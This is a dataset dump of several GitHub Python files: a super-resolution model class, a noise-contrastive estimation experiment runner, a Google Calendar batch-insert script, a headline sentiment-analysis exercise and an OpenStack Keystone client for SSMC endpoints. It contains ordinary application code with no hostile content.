l_g_total += self.compute_feature_loss(gen_feat, real_feat, gen_shape)\n l_g_total = torch.sum(l_g_total)\n l_g_total.backward()\n self.optimizer_G.step()\n self.log_dict['l_g_lpips'] = l_g_total.item()\n\n def test(self):\n self.netG.eval()\n with torch.no_grad():\n output = self.netG(self.lr, self.code)\n self.pred = output[-1]\n self.netG.train()\n\n def get_current_log(self):\n return self.log_dict\n\n def get_current_visuals(self, need_HR=True):\n out_dict = OrderedDict()\n out_dict['LR'] = self.lr.detach()[0].float().cpu()\n out_dict['HR_pred'] = self.pred.detach()[0].float().cpu()\n if need_HR:\n out_dict['HR'] = self.targets['HR'].detach()[0].float().cpu()\n return out_dict\n\n def print_network(self):\n # Generator\n s, n = self.get_network_description(self.netG)\n print('Number of parameters in G: {:,d}'.format(n))\n if self.is_train:\n message = '-------------- Generator --------------\\n' + s + '\\n'\n network_path = os.path.join(self.save_dir, '../', 'network.txt')\n with open(network_path, 'w') as f:\n f.write(message)\n\n def load(self):\n load_path_G = self.opt['path']['pretrain_model_G']\n if load_path_G is not None:\n print('loading model for G [{:s}] ...'.format(load_path_G))\n self.load_network(load_path_G, self.netG)\n\n def load_optimizer(self):\n load_path_O = self.opt['path']['pretrain_model_O']\n if load_path_O is not None:\n print('loading optimizer [{:s}] ...'.format(load_path_O))\n self.optimizer_G.load_state_dict(torch.load(load_path_O))\n\n def save(self, iter_label):\n self.save_network(self.save_dir, self.netG, 'G', iter_label)\n self.save_network(self.save_dir, self.optimizer_G, 'O', iter_label)\n","repo_name":"niopeng/HyperRIM","sub_path":"code/models/HyperRIM_model.py","file_name":"HyperRIM_model.py","file_ext":"py","file_size_in_byte":9342,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"41"} +{"seq_id":"28241864322","text":"import time\nfrom functools import partial\n\nimport numpy as np\n# import matplotlib.pyplot as plt\nimport torch\nfrom torch.utils.data import DataLoader\nfrom joblib import Memory\n\n\nfrom .defaults import DEFAULTS, CACHE_FOLDER\nfrom .train import run_epoch as run_epoch_extended\nfrom .train import Metrics, eval_downstream, callback_extended\nfrom .autoptim import minimize\nfrom .distribution.multivariate import MultivariateNormal, Histogram\nfrom .utils import (\n get_classif_upperbound,\n extract_weights,\n delete_weights,\n freeze,\n load_weights,\n get_name_from_dict,\n set_torch_seed\n)\n# from nlica.vis import (\n# visualize_timeseries,\n# visualize_distribution,\n# plot_kpis\n# )\n\n\ntorch.set_default_dtype(torch.float64)\n\n\nN_SAMPLES_TEST = 4000\nmem = Memory(CACHE_FOLDER)\n\n\ndef perturb_init_inplace(xlist, seed=None):\n '''xlist is a list of parameters'''\n # Control a factor of variation\n if seed is not None:\n set_torch_seed(seed)\n for x in xlist:\n # Define initialization noise\n init_noise_scale = 0.2\n init_noise = init_noise_scale * torch.randn_like(x.data)\n\n # Clamp unacceptable values (a bit barbaric)\n sel_too_big = init_noise > 0.5\n sel_too_small = init_noise < -0.5\n init_noise[sel_too_big] = 0.5\n init_noise[sel_too_small] = -0.5\n\n # Update the initial parameter\n x.data += init_noise # add gaussian noise\n\n\ndef run_model(**kwargs):\n torch.autograd.set_detect_anomaly(True)\n\n # WARNING: hardcoded\n # nb samples used to generate observation is different from\n # nb samples used in the predict_mse formula\n prop_noise = kwargs['noise_to_data'] / (1 + kwargs['noise_to_data'])\n n_samples_data_test = int((1 - prop_noise) * N_SAMPLES_TEST)\n\n if kwargs['predict_mse'] or kwargs['cost'] == \"asympmse\":\n n_samples_data = kwargs['n_samples_data_montecarlo']\n else:\n n_samples_data = int((1 - prop_noise) * kwargs['n_samples'])\n\n # Device\n device = \"cpu\"\n if kwargs['verbose']:\n print(\"device: \", device)\n\n # create_directory(kwargs['out'], overwrite=True)\n kwargs['out'].mkdir(exist_ok=True, parents=True)\n\n metrics = Metrics(path=kwargs['out'], verbose=kwargs['verbose'])\n\n # Add parameters of the experiment to metrics\n metrics.train.experiment.update(kwargs)\n\n # Estimatation procedure\n if kwargs['verbose']:\n print('Using :', kwargs[\"estimation\"])\n\n if kwargs[\"estimation\"] == \"singlence\":\n from nlica.estimation.single.singlence import Model, supervised, make_dataset\n elif kwargs[\"estimation\"] == \"singlemle\":\n from nlica.estimation.single.singlemle import Model, supervised, make_dataset\n run_epoch = partial(run_epoch_extended, supervised=supervised)\n\n # Generative model :\n if kwargs['verbose']:\n print('Using :', kwargs['generation'])\n if kwargs['generation'] == 'gaussian_mean':\n from nlica.generation.singleparam.gaussian_mean import get_model\n if kwargs['generation'] == 'gaussian_var':\n from nlica.generation.singleparam.gaussian_var import get_model\n elif kwargs['generation'] == 'gaussian_corr':\n from nlica.generation.singleparam.gaussian_corr import get_model\n\n data_marginal, source = get_model(\n n_comp=kwargs['n_comp'], n_samples=n_samples_data,\n seed=kwargs['seed_data_gen'], data_val=kwargs['data_val']\n )\n\n _, source_test = get_model(\n n_comp=kwargs['n_comp'], n_samples=n_samples_data_test,\n seed=kwargs['seed_data_testset'], data_val=kwargs['data_val']\n )\n\n data_marginal_truth, _ = get_model(\n n_comp=kwargs['n_comp'], n_samples=1,\n seed=kwargs['seed_data_gen'], data_val=kwargs['data_val']\n )\n\n obs = data_marginal.generator_true(source)\n obs_test = data_marginal.generator_true(source_test)\n\n # # Generative model : visualize sources and observations\n # if kwargs['with_plot']:\n # visualize_timeseries(source, figpath=kwargs['out'] / \"source_timeseries.pdf\")\n # visualize_distribution(source, figpath=kwargs['out'] / \"source_distribution.pdf\")\n # plt.close(\"all\")\n # visualize_timeseries(obs, figpath=kwargs['out'] / \"observation_timeseries.pdf\")\n # visualize_distribution(obs, figpath=kwargs['out'] / \"observation_distribution.pdf\")\n # plt.close(\"all\")\n\n # Choose contrastive noise\n\n # noise marginal\n if kwargs['noise_type'] == \"gaussian\":\n data_cov = torch.Tensor(np.cov(obs.data.numpy(), rowvar=False)).float()\n if kwargs['n_comp'] == 1:\n data_cov = data_cov * torch.eye(kwargs['n_comp']) # use 2-dim tensor instead of 0-dim\n noise_marginal = MultivariateNormal(loc=torch.zeros(kwargs['n_comp']),\n covariance_matrix=data_cov)\n del data_cov # not used afterwards\n elif kwargs['noise_type'] == \"likedata\":\n noise_marginal, _ = get_model(n_comp=kwargs['n_comp'], n_samples=1,\n seed=kwargs['seed_data_gen'], data_val=kwargs['data_val'])\n for param in noise_marginal.parameters():\n param.data = param.data * 0. + kwargs['noise_val']\n elif kwargs['noise_type'] == \"flexible\":\n noise_marginal = Histogram(n_bins=kwargs['noise_bins'], n_comp=kwargs['n_comp'])\n elif str(kwargs['noise_type'])[-3:] == \".th\": # a filename is entered\n temp = torch.load(kwargs['noise_type'])\n noise_marginal = Histogram(n_bins=temp['n_bins'], n_comp=temp['n_comp'])\n noise_marginal.load_state_dict(temp['noise_marginal_statedict'])\n\n # Formatting data (train/test datasets, dataloaders)\n metrics.train.experiment['n_samples'] = kwargs['n_samples']\n metrics.test.experiment['n_samples'] = N_SAMPLES_TEST\n metrics.train.experiment['n_samples_data'] = n_samples_data\n metrics.test.experiment['n_samples_data'] = n_samples_data_test\n\n # Estimation method (e.g. SingleMLE)\n model = Model(\n n_comp=kwargs['n_comp'],\n data_marginal_truth=data_marginal_truth,\n data_marginal=data_marginal,\n noise_marginal=noise_marginal,\n noise_to_data=kwargs['noise_to_data']\n )\n if kwargs['verbose']:\n print(model)\n\n # # Visualize estimated sources before training\n # if kwargs['with_plot']:\n # source_init = data_marginal.embedder(obs)\n # visualize_timeseries(source_init, figpath=kwargs['out'] / \"source_init_timeseries.pdf\")\n # visualize_distribution(source_init, figpath=kwargs['out'] / \"source_init_distribution.pdf\")\n # plt.close(\"all\")\n\n # Freeze parameters you do not want to train\n freeze(data_marginal_truth)\n if not kwargs['train_data']:\n freeze(data_marginal)\n if not kwargs['train_noise']:\n freeze(noise_marginal)\n # add gaussian noise to the data approximation we will optimize,\n # given it is initialized with the truth\n if kwargs['perturb_init']:\n perturb_init_inplace(list(data_marginal.parameters()), seed=kwargs['seed_data_gen'])\n\n trainable_params_names = [\n name for (name, param) in model.named_parameters() if param.requires_grad\n ]\n trainable_params_sel = [\n param.requires_grad for (_, param) in model.named_parameters()\n ]\n trainable_params_init_numpy = [\n param.data.numpy() for (sel, param) in zip(trainable_params_sel, model.parameters())\n if sel\n ]\n if kwargs['verbose']:\n print(\"Optimized parameters: \", trainable_params_names)\n\n if not kwargs['predict_mse']:\n\n if kwargs['cost'] == 'default':\n\n dataset_train = make_dataset(\n obs, noise_to_data=kwargs['noise_to_data'],\n noise_marginal=noise_marginal, seed=kwargs['seed_dataset'])\n dataset_test = make_dataset(\n obs_test, noise_to_data=kwargs['noise_to_data'],\n noise_marginal=noise_marginal, seed=kwargs['seed_dataset'] + 1)\n\n dataloaded_train = DataLoader(\n dataset_train, batch_size=kwargs['batch_size'], # len(dataset_train)\n shuffle=True) # , num_workers=0)\n dataloaded_test = DataLoader(\n dataset_test, batch_size=kwargs['batch_size'],\n shuffle=False)\n\n # Estimate Pretext Task difficulty\n if supervised:\n if kwargs['verbose']:\n print(\"Pretext Task : Random Forest... \\n\")\n acc_train, acc_test = get_classif_upperbound(\n dataset_train, dataset_test, max_depth=10, metrics=metrics, verbose=kwargs['verbose']\n )\n\n # Optimizer\n callback = partial(\n callback_extended,\n model=model,\n dataloaded_train=dataloaded_train,\n dataloaded_test=dataloaded_test,\n run_epoch=run_epoch,\n eval_downstream=eval_downstream,\n metrics=metrics,\n downstream_obs=obs_test,\n downstream_source=source_test,\n mixing_net=data_marginal.generator_true\n )\n\n def compute_cost(torch_vars):\n '''This is based on autoptim v.2., based on pytorch's autograd.'''\n _, names = extract_weights(model, requires_grad_only=True)\n delete_weights(model, requires_grad_only=True)\n load_weights(model, names, torch_vars)\n model.zero_grad()\n\n loss_train = run_epoch(\n model,\n dataloaded_train,\n optimizer=None,\n train=True,\n evaluat=False,\n metrics=metrics,\n )\n\n return loss_train\n\n objective_function = compute_cost\n\n elif kwargs['cost'] == 'asympmse':\n\n def compute_asympmse(torch_vars):\n '''This is based on autoptim v.2., based on pytorch's autograd.'''\n _, names = extract_weights(model, requires_grad_only=True)\n delete_weights(model, requires_grad_only=True)\n load_weights(model, names, torch_vars)\n model.zero_grad()\n\n # forward pass\n start = time.time()\n loss_train = model.predict_mse(x=obs, n_samples=kwargs['n_samples'], verbose=kwargs['verbose'])\n end = time.time()\n duration = np.round(end - start, 2)\n if kwargs['verbose']:\n print(f\"Forward pass takes {duration} seconds\")\n\n return loss_train\n\n objective_function = compute_asympmse\n\n callback = None\n\n # import ipdb; ipdb.set_trace()\n # select only non-frozen parameters\n solution, _ = minimize(\n objective_function=objective_function,\n optim_vars=trainable_params_init_numpy,\n method='CG',\n callback=callback,\n tol=1e-20,\n options={\"maxiter\": kwargs['n_epochs'], \"disp\": kwargs['verbose']}\n )\n assert solution # same as available params?\n\n # # Visualize estimated sources post training\n # if kwargs['with_plot']:\n # source_estim = data_marginal.embedder(obs)\n # visualize_timeseries(source_estim, figpath=kwargs['out'] / \"source_final_timeseries.pdf\")\n # visualize_distribution(source_estim, figpath=kwargs['out'] / \"source_final_distribution.pdf\")\n # plt.close(\"all\")\n\n # Save parameters of interest\n metrics.test.data_marginal_params = [param.data for param in data_marginal.parameters()]\n metrics.test.data_marginal_truth_params = [param.data for param in data_marginal_truth.parameters()]\n\n metrics.test.data_marginal_truth_statedict = data_marginal_truth.state_dict()\n metrics.test.data_marginal_statedict = data_marginal.state_dict()\n metrics.test.noise_marginal_statedict = noise_marginal.state_dict()\n\n else:\n # Compute predicted mse\n mse = model.predict_mse(\n x=obs, n_samples=kwargs['n_samples'],\n # important : keep this one args.n_samples and not n_samples\n verbose=kwargs['verbose']\n )\n metrics.mse_predicted = mse\n\n # if kwargs['with_plot']:\n # plot_kpis(metrics, figpath=kwargs['out'] / \"kpis.pdf\")\n\n return metrics\n\n\n# Wrap your experiment in one function\n@mem.cache # cache to avoid losing computations (checkpointing)\ndef run_mse_empirical(\n estimation=\"singlence\", generation=\"gaussian_var\",\n n_comp=1, n_samples=1000,\n noise_type=\"likedata\",\n prop_noise=0.5, noise_val=0.5,\n data_val=\"default\",\n seed=0, verbose=False,\n perturb_init=False,\n out=DEFAULTS['out']\n):\n t0 = time.time()\n # renaming variables\n noise_to_data = prop_noise / (1 - prop_noise)\n\n # get default arguments\n kwargs = DEFAULTS.copy()\n\n # overwrite with specified arguments\n kwargs.update({\n \"estimation\": estimation,\n \"generation\": generation,\n \"n_comp\": n_comp,\n \"n_samples\": n_samples,\n \"prop_noise\": prop_noise,\n \"noise_type\": noise_type,\n \"noise_val\": noise_val,\n \"seed_data_gen\": seed,\n \"seed_dataset\": seed,\n \"verbose\": verbose,\n \"noise_to_data\": noise_to_data,\n \"out\": out,\n \"data_val\": data_val,\n \"perturb_init\": perturb_init,\n #\n \"train_data\": True,\n \"experiment\": \"mse_empirical\",\n \"hue\": str(n_samples),\n \"predict_mse\": False\n })\n\n # Rename output directory\n name = get_name_from_dict(kwargs)\n kwargs['out'] = kwargs['out'] / kwargs['experiment'] / kwargs['estimation'] / kwargs['hue'] / name\n\n # Run estimation\n metrics = run_model(**kwargs)\n\n # Collect and format results: flatten and concatenate the parameters into one big vector\n params_estim = torch.cat([param.flatten() for param in metrics.test.data_marginal_params])\n params_true = torch.cat([param.flatten() for param in metrics.test.data_marginal_truth_params])\n\n # Compute squared error\n se = torch.pow(params_estim - params_true, 2).mean().item()\n\n # return a dict to get a DataFrame down the road\n output = {\n \"estimation\": estimation,\n \"generation\": generation,\n \"n_samples\": n_samples,\n \"prop_noise\": prop_noise,\n \"data_val\": data_val,\n \"noise_val\": noise_val,\n \"seed\": seed,\n \"params_estim\": params_estim,\n \"params_true\": params_true,\n \"se\": se,\n \"noise_type\": noise_type,\n \"computation_time\": time.time() - t0\n }\n\n return output # return a dict to get a DataFrame down the road\n\n\n# Wrap your experiment in one function\n@mem.cache # cache to avoid losing computations (checkpointing)\ndef run_mse_montecarlo(\n estimation=\"singlence\", generation=\"gaussian_var\",\n n_comp=1, n_samples=1000,\n prop_noise=0.5, noise_val=0.5,\n noise_type=\"likedata\",\n data_val=\"default\",\n seed=0, verbose=False,\n perturb_init=False,\n out=DEFAULTS['out'],\n n_samples_data_montecarlo=10000\n):\n t0 = time.time()\n # renaming variables\n noise_to_data = prop_noise / (1 - prop_noise)\n\n # get default arguments\n kwargs = DEFAULTS.copy()\n\n # overwrite with specified arguments\n kwargs.update({\n \"estimation\": estimation,\n \"generation\": generation,\n \"n_comp\": n_comp,\n \"n_samples\": n_samples,\n \"prop_noise\": prop_noise,\n \"data_val\": data_val,\n \"noise_type\": noise_type,\n \"noise_val\": noise_val,\n \"seed_data_gen\": seed,\n \"seed_dataset\": seed,\n \"verbose\": verbose,\n \"noise_to_data\": noise_to_data,\n \"out\": out,\n \"perturb_init\": perturb_init,\n \"n_samples_data_montecarlo\": n_samples_data_montecarlo,\n #\n \"train_data\": True,\n \"experiment\": \"mse_prediction\",\n \"hue\": str(n_samples),\n \"predict_mse\": True\n })\n\n # Rename output directory\n name = get_name_from_dict(kwargs)\n kwargs['out'] = kwargs['out'] / kwargs['experiment'] / kwargs['estimation'] / kwargs['hue'] / name\n\n # Run estimation\n metrics = run_model(**kwargs)\n\n # Collect results\n mse = metrics.mse_predicted\n\n # return a dict to get a DataFrame down the road\n output = {\n \"estimation\": estimation,\n \"generation\": generation,\n \"n_samples\": n_samples,\n \"n_samples_data_montecarlo\": n_samples_data_montecarlo,\n \"prop_noise\": prop_noise,\n \"noise_val\": noise_val,\n \"data_val\": data_val,\n \"seed\": seed,\n \"mse_pred\": mse.item(),\n \"noise_type\": noise_type,\n \"computation_time\": time.time() - t0\n }\n\n return output\n\n\n# Wrap your experiment in one function\n@mem.cache # cache to avoid losing computations (checkpointing)\ndef run_mse_quadrature(\n generation='gaussian_var', prop_noise=0.5,\n data_val=1., noise_val=0, n_samples=400, estimation='singlence', noise_type='data',\n):\n if generation == \"gaussian_var\":\n from nlica.quadrature.singleparam.gaussian_var import get_mse_quadrature\n elif generation == \"gaussian_mean\":\n from nlica.quadrature.singleparam.gaussian_mean import get_mse_quadrature\n elif generation == \"gaussian_corr\":\n from nlica.quadrature.singleparam.gaussian_corr import get_mse_quadrature\n mse = get_mse_quadrature(\n estimation=estimation,\n n_samples=n_samples,\n prop_noise=prop_noise,\n param_data=data_val,\n param_noise=noise_val,\n noise_type=noise_type\n )\n results = {\n \"mse\": mse,\n \"generation\": generation,\n \"prop_noise\": prop_noise,\n \"data_val\": data_val, \"noise_val\": noise_val,\n \"n_samples\": n_samples,\n \"estimation\": estimation,\n \"noise_type\": noise_type\n }\n\n return results\n\n\n# Wrap your experiment in one function\n@mem.cache # cache to avoid losing computations (checkpointing)\ndef run_optimal_noise(\n estimation=\"singlence\", generation=\"gaussian_var\",\n n_comp=1, n_samples=10000,\n n_samples_data_montecarlo=10000,\n prop_noise=0.5,\n data_val=\"default\",\n seed=0, verbose=True, noise_bins=20,\n out=DEFAULTS['out'], n_epochs=100,\n):\n t0 = time.time()\n # renaming variables\n noise_to_data = prop_noise / (1 - prop_noise)\n\n # get default arguments\n kwargs = DEFAULTS.copy()\n\n # overwrite with specified arguments\n kwargs.update({\n \"estimation\": estimation,\n \"generation\": generation,\n \"n_comp\": n_comp,\n \"n_samples\": n_samples,\n \"n_samples_data_montecarlo\": n_samples_data_montecarlo,\n \"prop_noise\": prop_noise,\n \"seed_data_gen\": seed,\n \"seed_dataset\": seed,\n \"verbose\": verbose,\n \"noise_to_data\": noise_to_data,\n \"noise_bins\": noise_bins,\n \"out\": out,\n \"data_val\": data_val,\n \"n_epochs\": n_epochs,\n #\n \"train_noise\": True,\n \"perturb_init\": False,\n \"noise_type\": \"flexible\",\n \"experiment\": \"optimalnoise\",\n \"hue\": generation,\n \"cost\": \"asympmse\"\n })\n\n # Rename output directory\n name = get_name_from_dict(kwargs)\n kwargs['out'] = kwargs['out'] / kwargs['experiment'] / kwargs['estimation'] / kwargs['hue'] / name\n\n # Run estimation\n metrics = run_model(**kwargs)\n\n # return a dict to get a DataFrame down the road\n output = {\n \"estimation\": estimation,\n \"generation\": generation,\n \"n_samples\": n_samples,\n \"n_samples_data_montecarlo\": n_samples_data_montecarlo,\n \"prop_noise\": prop_noise,\n \"data_val\": data_val,\n \"seed\": seed,\n \"n_comp\": n_comp,\n \"n_bins\": noise_bins,\n \"data_marginal_statedict\": metrics.test.data_marginal_statedict,\n \"data_marginal_truth_statedict\": metrics.test.data_marginal_truth_statedict,\n \"noise_marginal_statedict\": metrics.test.noise_marginal_statedict,\n \"computation_time\": time.time() - t0\n }\n\n return output\n","repo_name":"l-omar-chehab/nce-noise-var","sub_path":"nlica/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":20223,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"41"} +{"seq_id":"11821469668","text":"\"\"\"\nAdd event to Google Calendar\n\"\"\"\nimport datetime\n\nimport httplib2\nfrom googleapiclient.discovery import build, Resource\nfrom googleapiclient.http import BatchHttpRequest\nfrom httplib2 import Http\nfrom oauth2client import tools\nfrom oauth2client.client import OAuth2WebServerFlow\nfrom oauth2client.file import Storage\n\ngoogle_client_id = ''\ngoogle_client_secret = ''\ngoogle_calendar_id = ''\n\n\ndef build_events():\n today = datetime.datetime.now().replace(second=0)\n events = list()\n\n events.append({\n 'summary': 'Test Event',\n 'start': {\n 'dateTime': today.replace(hour=9, minute=30).strftime('%Y-%m-%dT%H:%M:%S'),\n 'timeZone': 'Asia/Tokyo'\n },\n 'end': {\n 'dateTime': today.replace(hour=13, minute=00).strftime('%Y-%m-%dT%H:%M:%S'),\n 'timeZone': 'Asia/Tokyo'\n }\n })\n\n return events\n\n\ndef main():\n scope = 'https://www.googleapis.com/auth/calendar'\n flow = OAuth2WebServerFlow(google_client_id, google_client_secret, scope)\n\n storage = Storage('credentials.dat')\n\n credentials = storage.get()\n\n if credentials is None or credentials.invalid:\n credentials = tools.run_flow(flow, storage, tools.argparser.parse_args())\n\n http: Http = httplib2.Http()\n http: Http = credentials.authorize(http)\n\n service: Resource = build('calendar', 'v3', http=http)\n\n batch: BatchHttpRequest = service.new_batch_http_request()\n\n for event in build_events():\n batch.add(service.events().insert(calendarId=google_calendar_id, body=event))\n\n batch.execute(http=http)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mark5cinco/lazy-scripts","sub_path":"google/google_calendar/log_day.py","file_name":"log_day.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"21889636458","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 3 10:55:54 2023\r\n\r\n@author: sumike\r\n\"\"\"\r\n\r\nimport pandas as pd \r\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\r\n\r\n#reading excel files\r\ndata = pd.read_excel(\"articles.xlsx\")\r\n\r\n#summary of the data\r\ndata.describe()\r\n\r\n#summary of columns\r\ndata.info()\r\n\r\n#countin the number of articles per source\r\n# group by syntax: df.groupby([column to group])[column to count].count()\r\n\r\ndata.groupby(['source_id'])['article_id'].count()\r\n\r\n# number of reactions by publisher\r\ndata.groupby(['source_id'])['engagement_reaction_count'].sum() \r\n\r\n#dropping a column\r\ndata = data.drop('engagement_comment_plugin_count' , axis=1)\r\n\r\n#Functions in python\r\n\r\ndef thisFunction():\r\n print('This is my first fucntion')\r\n \r\nthisFunction()\r\n\r\n#This is a function with variables\r\ndef aboutMe(name,surname, location):\r\n print('this is ' +name+\" \"+surname+\". \"+\"My location is \"+location)\r\n return name,surname,location\r\n \r\ninfo = aboutMe(\"Sumi\",\"Johnes\",\"USA\")\r\n\r\n#using for loops in functions\r\n\r\ndef favFood(food):\r\n for x in food:\r\n print(\"top food is \"+x)\r\n \r\nfastfood = ['burgers','pizza','noodles']\r\nfavFood(fastfood)\r\n\r\n#creating a keyword flag \r\n\r\n''' keyword = 'crash'\r\nlength = len(data)\r\nkeyword_flag = []\r\nfor x in range(0,length):\r\n heading = data['title'][x]\r\n if keyword in heading:\r\n flag = 1\r\n else:\r\n flag = 0\r\n \r\n keyword_flag.append(flag)\r\nprint(keyword_flag) '''\r\n \r\n#creating a function\r\n\r\ndef keyWordFlag(keyword):\r\n length = len(data)\r\n keyword_flag = []\r\n for x in range(0,length):\r\n heading = data['title'][x]\r\n try:\r\n if keyword in heading:\r\n flag = 1\r\n else:\r\n flag = 0\r\n except:\r\n flag = 0\r\n \r\n keyword_flag.append(flag)\r\n return keyword_flag\r\n \r\n \r\nkeyWordFlag = keyWordFlag('murder')\r\n#print(keyWordFlag) \r\n\r\n#creating new column\r\ndata['KeyWordFlag'] = pd.Series(keyWordFlag) \r\n\r\n# SentimentIntensityAnalyzer\r\n\r\nsentiment_int = SentimentIntensityAnalyzer()\r\ntext = data['title'][16]\r\nsentiment = sentiment_int.polarity_scores(text)\r\n\r\nneg = sentiment['neg']\r\npos = sentiment['pos']\r\nneu = sentiment['neu']\r\n\r\n#looping through\r\n\r\nneg_sentiment_title = []\r\npos_sentiment_title = []\r\nneu_sentiment_title = []\r\n\r\nlength = len(data)\r\nsentiment_int = SentimentIntensityAnalyzer()\r\nfor x in range(0,length):\r\n try:\r\n text = data['title'][x]\r\n sentiment = sentiment_int.polarity_scores(text)\r\n neg = sentiment['neg']\r\n pos = sentiment['pos']\r\n neu = sentiment['neu']\r\n except:\r\n neg = 0\r\n pos = 0\r\n neu = 0\r\n neg_sentiment_title.append(neg)\r\n pos_sentiment_title.append(pos)\r\n neu_sentiment_title.append(neu)\r\n\r\n# converting to series creatine new columns\r\n\r\ndata['neg_sentiment_title'] = pd.Series(neg_sentiment_title)\r\ndata['pos_sentiment_title'] = pd.Series(pos_sentiment_title)\r\ndata['neu_sentiment_title'] = pd.Series(neu_sentiment_title)\r\n\r\n\r\ndata.to_excel(\"blogme_clean.xlsx\",sheet_name=\"blogmedata\", index = False)\r\n\r\n\r\n \r\n\r\n\r\n\r\n","repo_name":"sumijohnes/PyhtonandTableu","sub_path":"blogme.py","file_name":"blogme.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"13855160696","text":"try:\n import json\nexcept ImportError:\n import simplejson as json\n\nfrom horizon_hpe_storage.api.common import exceptions\nfrom horizon_hpe_storage.api.common import http\n\n\nclass HTTPJSONRESTClient(http.HTTPJSONRESTClient):\n \"\"\"\n HTTP/REST client to access keystone service\n \"\"\"\n\n def initClient(self, token, tenant_id):\n # use the unscoped token from the Horizon session to get a\n # real admin token that we can use to access Keystone and Barbican\n self.token_id = None\n self.auth_try = 0\n try:\n info = {\n 'auth': {\n 'tenantId': tenant_id,\n 'token': {\n 'id': token\n }\n }\n }\n\n resp, body = self.post('/v2.0/tokens', body=info)\n if body and 'access' in body:\n access = body['access']\n if 'token' in access:\n newToken = access['token']\n self.token_id = newToken['id']\n self.tenant_id = tenant_id\n except Exception as ex:\n exceptions.handle(self.request,\n ('Unable to get Keystone token.'))\n\n def getTokenId(self):\n return self.token_id\n\n def getTenantId(self):\n return self.tenant_id\n\n def getSSMCEndpointForHost(self, host):\n try:\n # first get service id\n header = {'X-Auth-Token': self.token_id}\n\n resp, body = self.get(\n '/v3/services?name=ssmc-' + host,\n headers=header)\n\n if body and 'services' in body:\n services = body['services']\n service = services[0]\n if service and 'id' in service:\n service_id = service['id']\n\n # now get endpoint for this service\n if service_id:\n resp, body = self.get('/v3/endpoints?service_id=' +\n service_id, headers=header)\n if body and 'endpoints' in body:\n endpoints = body['endpoints']\n endpoint = endpoints[0]\n return endpoint['url']\n\n return None\n except Exception as ex:\n exceptions.handle(self.request,\n ('Unable to get SSMC Endpoint for host.'))\n\n def getSSMCEndpointForServiceName(self, service_name):\n # first get service id\n header = {'X-Auth-Token': self.token_id}\n\n resp, body = self.get(\n '/v3/services?name=ssmc-3parfc',\n headers=header)\n if body and 'services' in body:\n services = body['services']\n service = services[0]\n if service and 'id' in service:\n service_id = service['id']\n\n # now get endpoint for this service\n if service_id:\n resp, body = self.get(\n '/v3/endpoints?service_id=' +\n service_id, headers=header)\n if body and 'endpoints' in body:\n endpoints = body['endpoints']\n endpoint = endpoints[0]\n return endpoint['url'], service_id\n\n return None\n\n def getSSMCEndpointForServiceId(self, service_id):\n # first get service id\n header = {'X-Auth-Token': self.token_id}\n\n url = '/v3/services/' + service_id\n resp, body = self.get(url, headers=header)\n if body and 'service' in body:\n service = body['service']\n if service and 'id' in service:\n service_id = service['id']\n service_name = service['name']\n\n # now get endpoint for this service\n if service_id:\n resp, body = self.get('/v3/endpoints?service_id=' +\n service_id, headers=header)\n if body and 'endpoints' in body:\n endpoints = body['endpoints']\n if endpoints:\n endpoint = endpoints[0]\n return endpoint, service_name\n\n return None\n\n def getSSMCServiceName(self, service_id):\n header = {'X-Auth-Token': self.token_id}\n\n url = '/v3/services/' + service_id\n resp, body = self.get(url, headers=header)\n if body and 'service' in body:\n service = body['service']\n if service and 'name' in service:\n service_name = service['name']\n return service_name\n return None\n\n def getSSMCEndpoints(self):\n endpoints = []\n # get all 3par-link services\n self.auth_try = 1\n header = {'X-Auth-Token': self.token_id}\n try:\n resp, body = self.get(\n '/v3/services?type=3par-link',\n headers=header)\n if body and 'services' in body:\n services = body['services']\n # get endpoint for each service\n for service in services:\n if service and 'id' in service:\n id = service['id']\n endpt, name = self.getSSMCEndpointForServiceId(id)\n if endpt:\n endpointData = {}\n endpointData['id'] = service['id']\n backend = name[5:] # remove 'ssmc-' prefix\n endpointData['backend'] = backend\n endpointData['endpoint'] = endpt['url']\n endpoints.append(endpointData)\n\n return endpoints\n except Exception as ex:\n exceptions.handle(self.request,\n ('Unable to get SSMC Endpoints.'))\n\n def addSSMCEndpoint(self, service_name, endpoint):\n # first add service\n header = {'X-Auth-Token': self.token_id}\n info = {\n 'service': {\n 'type': '3par-link',\n 'name': service_name,\n 'description': 'link to SSMC instance'\n }\n }\n resp, body = self.post('/v3/services', headers=header, body=info)\n\n # now add endpoint for service\n if body and 'service' in body:\n service = body['service']\n if service and 'id' in service:\n service_id = service['id']\n if service_id:\n info = {\n 'endpoint': {\n 'interface': 'admin',\n 'region': 'RegionOne',\n 'url': endpoint,\n 'service_id': service_id\n }\n }\n resp, body = self.post(\n '/v3/endpoints',\n headers=header,\n body=info)\n\n def updateSSMCEndpointUrl(self, service_id, url):\n # first need to get endpoint id\n endpt, service_name = self.getSSMCEndpointForServiceId(service_id)\n endpt_id = endpt['id']\n header = {'X-Auth-Token': self.token_id}\n # update endpoint for service\n try:\n info = {\n 'endpoint': {\n 'interface': 'admin',\n 'region': 'RegionOne',\n 'url': url,\n 'service_id': service_id\n }\n }\n resp, body = self.patch(\n '/v3/endpoints/' + endpt_id,\n headers=header,\n body=info)\n except Exception as ex:\n exceptions.handle(self.request,\n ('Unable to update SSMC Endpoint URL.'))\n\n def deleteSSMCEndpoint(self, service_id):\n header = {'X-Auth-Token': self.token_id}\n try:\n # first delete endpoint for the service\n endpt, service_name = self.getSSMCEndpointForServiceId(service_id)\n resp = self.delete('/v3/endpoints/' + endpt['id'], headers=header)\n\n # now delete the service\n resp = self.delete('/v3/services/' + service_id, headers=header)\n except Exception as ex:\n exceptions.handle(self.request,\n 'Unable to delete SSMC Endpoint.')\n","repo_name":"hpe-storage/horizon-hpe-storage-ui","sub_path":"horizon_hpe_storage/api/keystoneClient/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":8267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} 